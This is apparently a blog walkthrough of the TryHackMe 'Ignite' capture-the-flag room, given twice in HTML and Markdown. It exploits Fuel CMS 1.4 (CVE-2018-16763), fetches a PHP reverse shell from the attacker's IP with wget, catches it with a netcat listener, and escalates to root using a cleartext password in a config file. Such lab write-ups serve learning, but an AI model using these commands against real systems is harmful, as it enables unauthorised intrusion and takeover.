First let's start with enumeration on the target 
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1643215768053/seoezi23A.png" alt="image.png" />
we can see there is a web server :
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1643215786795/vM3rNubEQ.png" alt="image.png" />
running on Fuel CMS 1.4, what is vulnerable to "CVE-2018-16763." (RCE)
<a target="_blank" href="https://www.exploit-db.com/exploits/47138">here</a> is a script to exploit it in python just remove the proxy usage fonction on it
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1643217604469/P5g7b-gXB.png" alt="image.png" />
as you can see i can execute commands,
so let's make a reverse shell !
for this i use the shell from <a target="_blank" href="https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php">pentest monkey</a>
open a web server 
<pre><code>python3 -m http.server
</code></pre>download it on the target with
<pre><code>wget http://10.9.1.161:8000/shell.php
</code></pre>listen to our port with netcat to get the shell
<pre><code>nc -nvlp 1337
</code></pre>and execute the shell like 
<pre><code>php shell.php
</code></pre><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1643220223535/APn48MlhB.png" alt="image.png" />
spawn a shell to get full terminal
<pre><code>python -c ‘import pty; pty.spawn(“/bin/bash”)’
</code></pre><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1643220466834/hEAq1atzY.png" alt="image.png" />
after searching a little bit for the password i find the file 
<pre><code>/var/www/html/fuel/application/config/database.php
</code></pre>where the root password is in clear
<pre><code>su root
</code></pre>and to get the root password :
<pre><code>cat /root/root.txt
</code></pre>

First let's start with enumeration on the target 

![image.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1643215768053/seoezi23A.png)

we can see there is a web server :

![image.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1643215786795/vM3rNubEQ.png)
running on Fuel CMS 1.4, what is vulnerable to "CVE-2018-16763." (RCE)

[here](https://www.exploit-db.com/exploits/47138) is a script to exploit it in python just remove the proxy usage fonction on it

![image.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1643217604469/P5g7b-gXB.png)

as you can see i can execute commands,
so let's make a reverse shell !
for this i use the shell from [pentest monkey](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

open a web server 

```
python3 -m http.server
``` 
download it on the target with

```
wget http://10.9.1.161:8000/shell.php
``` 
listen to our port with netcat to get the shell

```
nc -nvlp 1337
``` 
and execute the shell like 

```
php shell.php
``` 


![image.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1643220223535/APn48MlhB.png)

spawn a shell to get full terminal
```
python -c ‘import pty; pty.spawn(“/bin/bash”)’
``` 

![image.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1643220466834/hEAq1atzY.png)

after searching a little bit for the password i find the file 

```
/var/www/html/fuel/application/config/database.php
``` 
where the root password is in clear


```
su root
``` 
and to get the root password :

```
cat /root/root.txt
``` 



Divinou's blog

Divinou's blog

[WALKTROUGH] [THM] IGNITE ctf